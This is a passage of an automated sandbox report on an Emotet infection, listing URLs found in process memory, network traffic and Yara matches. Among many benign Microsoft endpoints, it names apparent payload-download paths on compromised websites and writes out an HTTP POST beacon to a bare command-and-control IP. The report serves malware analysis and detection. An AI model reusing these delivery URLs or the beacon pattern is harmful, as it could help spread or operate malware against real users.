H","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: unknown
                DNS traffic detected: queries for: physio-svdh.ch
                Source: unknown
                HTTP traffic detected:
                POST /hzctvbal94fl2bqa/ HTTP/1.1
                DNT: 0
                Referer: 173.249.20.233/hzctvbal94fl2bqa/
                Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: 173.249.20.233:443
                Content-Length: 8516
                Connection: Keep-Alive
                Cache-Control: no-cache
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.entity.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                Source: svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cr.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://devnull.onenote.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://directory.services.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 00000004.00000002.698282309.0000027114DD0000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.700973531.000002712B7C0000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lifecycle.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.local
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://messaging.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeapps.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/beckenbodentherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/entspannungstherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/hausbesuche/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/lymphdrainage/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/physiotherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/schwindeltherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/training-fuer-senioren/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/comments/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/kontakt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/offene-stellen/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/ueber-uns/about-us/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.8
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cmsms-mega-menu//js/jquery.megaMenu.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.mi
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/adaptive.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquer0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.iLightBox.min.js?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.script.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.tweet.min.js?ver=1.3.1
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknown | HTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud:

                Yara detected Emotet
                Source: Yara match | File source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
